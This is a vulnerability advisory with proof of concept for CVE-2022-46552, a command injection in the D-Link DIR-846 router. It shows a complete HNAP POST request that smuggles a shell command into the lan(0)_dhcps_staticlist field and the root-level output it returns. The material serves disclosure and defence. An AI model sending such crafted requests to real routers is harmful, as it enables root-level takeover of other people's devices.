CVE-2022-46552: D-Link DIR-846 Wireless Router in firmware FW100A53DBR-Retail has vulnerability that leads to a RCE
1. Vulnerability Information
Authors: Françoa Taffarel Rosário Corrêa, Osmany Barros de Freitas and Lourenço Alves Pereira Junior.
Affiliation: Aeronautics Institute of Technology (ita.br)
Common Weakness Enumeration: CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Vulnerability Description: D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.
The detail of vulnerability: The exploitation method corresponds to an injection command through a Authenticated user input with special characters. In this case, the file SetIpMacBindSettings.php (line 79) contains an exec function with a partially sanitized user input. Thus, an attacker can execute arbitrary commands by sending a maliciously crafted payload through a POST request. The HTTP message content is JSON-encoded and has the lan(0)_dhcps_staticlist key, a string with comma-separated values. Therefore, the attacker must insert the malicious payload in the second value, leading the web server in the D-Link DIR-846 to invoke exec(changename.sh $mac "$(malicious_payload_command)") on the host system.
Vendor of the product: D-LINK
Affected product: DIR-846
Affected Version: Firmware DIR846enFW100A53DBR-Retail
Vulnerability Score V3.1: 9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Dates info:
Vulnerability discover: 30/11/2022
First try contact with vendor: 01/12/2022
Request CVE ID (MITRE): 01/12/2022
Date Record Created (MITRE): 05/12/2022
First vendor response: 08/12/2022
CVE Assignment Team response: 10/01/2023
Second try contact with vendor: 01/12/2022
CVE published in the CVE List:
2. Proof of Concept
Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter (Authenticated)
Google Dork: NA
Date: 30/01/2023
Exploit Author: Françoa Taffarel
Vendor Homepage: https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suporte
Software Link: https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
Version: DIR846enFW100A53DBR-Retail
Tested on: D-LINK DIR-846
CVE: CVE-2022-46552
D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.
Malicious POST Request
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
Content-Length: 171
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4
{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}
Response
HTTP/1.1 200 OK
X-Powered-By: PHP/7.1.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Thu, 01 Dec 2022 11:03:54 GMT
Server: lighttpd/1.4.35
Content-Length: 68
{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}
Data from RCE Request
GET /HNAP1/rce_confirmed HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Date: Thu, 01 Dec 2022 23:24:28 GMT
Server: lighttpd/1.4.35
uid=0(root) gid=0(root)